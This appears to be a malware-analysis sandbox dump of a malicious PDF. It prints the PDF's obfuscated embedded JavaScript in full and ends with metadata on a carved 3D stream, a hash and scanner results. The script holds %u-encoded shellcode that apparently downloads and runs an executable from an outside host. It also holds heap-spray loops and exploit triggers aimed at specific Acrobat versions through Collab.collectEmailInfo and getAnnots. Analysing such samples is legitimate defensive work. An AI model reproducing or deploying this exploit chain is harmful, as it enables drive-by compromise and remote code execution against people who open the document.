"%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7470%u7842%u004e%u7468%u7074%u2f3a%u702f%u6a68%u6975%u7162%u6f70%u6b78%u632e%u6d6f%u6e2f%u6574%u702f%u6f72%u2e78%u7865%u2f65%u4879%u6438%u6539%u6665%u6330%u3056%u3031%u6630%u3630%u3030%u3630%u3052%u3336%u3033%u3266%u3131%u3230%u6354%u3931%u3239%u6531%u3265%u3330%u306c%u3030%u0063";app.h_645__M = unescape(h__4dhPyQGqO87(l1_8r__I, Y_62Ahe4Pafd0I1));var W___5C_Q = 0x400000;var Y17Y1GEh = K1R6Pv.length * 2;var OY_P_51n = W___5C_Q - (Y17Y1GEh+0x38);gC3__615Ls4T5 = Kba_2_u(gC3__615Ls4T5, OY_P_51n);var Y0__D2ijK = (KYTml4_p0CS - 0x400000)/W___5C_Q;for (var dx7nV3p4u = 0; dx7nV3p4u < Y0__D2ijK; dx7nV3p4u++) {gRcn__Y1f[dx7nV3p4u] = gC3__615Ls4T5 + K1R6Pv;}}function m__Ba2K(){var mDS5_rMqu7rhG = "";for (t11Nj_e7_1ks4d = 0; t11Nj_e7_1ks4d < 12; t11Nj_e7_1ks4d++) {mDS5_rMqu7rhG += unescape("%u0c0c%u0c0c");}var qQ_X_____F__7 = "";for (t11Nj_e7_1ks4d = 0; t11Nj_e7_1ks4d < 750; t11Nj_e7_1ks4d++) {qQ_X_____F__7 += mDS5_rMqu7rhG;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: qQ_X_____F__7});app.clearTimeOut(TnB_r_25vQ);}function Q8_u5x0_cgh(QSG0X1_qq_P_i5k){var W4rnn_yWB2Ah7Qr = TnB_r_25vQ;if ((QSG0X1_qq_P_i5k >= 8 && QSG0X1_qq_P_i5k < 8.11) || QSG0X1_qq_P_i5k < 7.1) {OrA2_8_lN5851_s(23, "%u0c0c%u0c0c", QSG0X1_qq_P_i5k);app.jm0H5L = m__Ba2K;TnB_r_25vQ = app.setTimeOut("app.jm0H5L()", 1);} if (QSG0X1_qq_P_i5k < 7.12) {function vGuXPu6v_F603_1() {try {OrA2_8_lN5851_s(22, "%u0c0c%u0c0c", QSG0X1_qq_P_i5k);var Qa68Aa = -0x7CFCFCFD;this.getAnnots(Qa68Aa, Qa68Aa, Qa68Aa, Qa68Aa);} catch(e) {console.println("annots exception error"); }}vGuXPu6v_F603_1();}OrA2_8_lN5851_s(13, "%u0c0c%u0c0c", QSG0X1_qq_P_i5k);if (W4rnn_yWB2Ah7Qr) {app.clearTimeOut(W4rnn_yWB2Ah7Qr);}}var A_g8Hu___w0 = 0;var n5p_j3__c = app.plugIns;for (var B__300H_di_cVF = 0; B__300H_di_cVF < n5p_j3__c.length; B__300H_di_cVF++) {var f_p2GO = n5p_j3__c[B__300H_di_cVF].version;if (f_p2GO > A_g8Hu___w0) { A_g8Hu___w0 = f_p2GO; }}if (app.viewerVersion == 9.103 && A_g8Hu___w0 < 9.13) {A_g8Hu___w0 = 9.13;}if (!(A_g8Hu___w0 < 9 || A_g8Hu___w0 >= 9.2) ||    !(A_g8Hu___w0 < 8 || A_g8Hu___w0 >= 8.17) ||    !(A_g8Hu___w0 < 7 || A_g8Hu___w0 >= 7.14)) {Q8_u5x0_cgh(A_g8Hu___w0);}
u3d_00_off00003594.bin pdf-3d-stream PDF U3D 3D stream at offset 0x3594 27449 bytes
SHA-256: 48816569ab4f370009a917ef6429edbe09e4dfe8a63b00a0a0f75a904c62ba94
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.